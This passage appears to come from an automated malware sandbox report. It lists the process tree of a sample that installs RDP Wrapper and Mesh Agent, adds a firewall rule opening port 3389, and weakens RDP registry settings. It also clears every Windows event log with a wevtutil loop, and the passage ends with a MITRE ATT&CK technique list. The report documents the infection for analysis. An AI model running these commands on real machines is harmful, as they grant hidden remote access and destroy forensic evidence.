      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      Modifies WinLogon
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:776
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5720
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
      4⤵
      PID:3172
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
      4⤵
      PID:4056
  - - C:\Windows\system32\reg.exe
      reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
      4⤵
      PID:1292
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
      4⤵
      PID:972
    - - C:\Windows\system32\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        5⤵
        
        PID:4780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
      4⤵
      PID:2268
    - - C:\Windows\system32\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
        5⤵
        
        PID:1996
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.22000.469" /f
      4⤵
      PID:5136
  - - C:\Windows\system32\findstr.exe
      findstr /c:"[10.0.22000.469]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:2460
  - - C:\Windows\system32\PING.EXE
      ping -n 1 google.com
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
      4⤵
      PID:1748
    - - C:\Windows\system32\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        5⤵
        Blocklisted process makes network request
        Drops file in Program Files directory
        
        PID:1712
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1240
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2404
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      Modifies WinLogon
      Drops file in Program Files directory
      PID:2156
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5384
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
      4⤵
      PID:1936
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
      4⤵
      PID:2060
  - - C:\Windows\system32\findstr.exe
      findstr /c:"[10.0.22000.469]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
      4⤵
      PID:3396
  - - C:\Windows\system32\PING.EXE
      ping -n 1 google.com
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/sebaxakerhtc/rdpwrap.ini/master/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
      4⤵
      PID:3232
    - - C:\Windows\system32\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/sebaxakerhtc/rdpwrap.ini/master/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        5⤵
        Blocklisted process makes network request
        Drops file in Program Files directory
        
        PID:5324
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5708
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2668
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      Modifies WinLogon
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:2416
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4636
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
      4⤵
      PID:2588
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
      4⤵
      PID:5756
  - - C:\Windows\system32\findstr.exe
      findstr /c:"[10.0.22000.469]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
      4⤵
      PID:576
- C:\Windows\system32\cmd.exe
  cmd /C for /F "tokens=*" in ('wevtutil.exe el') DO wevtutil.exe cl ""
  2⤵
  PID:1668

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4540
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5988
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:5272
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1836
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:756
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:2400
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:5148

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1208
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5384
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5436
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4876
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:460
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:1020

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1744
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:908
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:2676
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3812
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:3404
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:4544

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:1080

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:816
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5060
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3232
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:3352
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6132
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1848

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5364

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5152

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3332
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1764
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4532
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3260
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5260
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:908

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3148

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4728
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3364
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4188
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:3024
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4476
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4908

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:4060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4904

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3944
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:884
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1908
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1080
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4876
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5188

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:5180

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5780

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:6068
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4600
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:4936
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3448
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4556
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3240

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:4552
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5056
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:6052
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5940
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4700
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:6108

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1836
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3392
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1380
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:5244
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5548
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1472
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6036

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:2976
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3012
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2928
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3136
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:456
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3056
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2804

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:5124
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4256
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4148
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry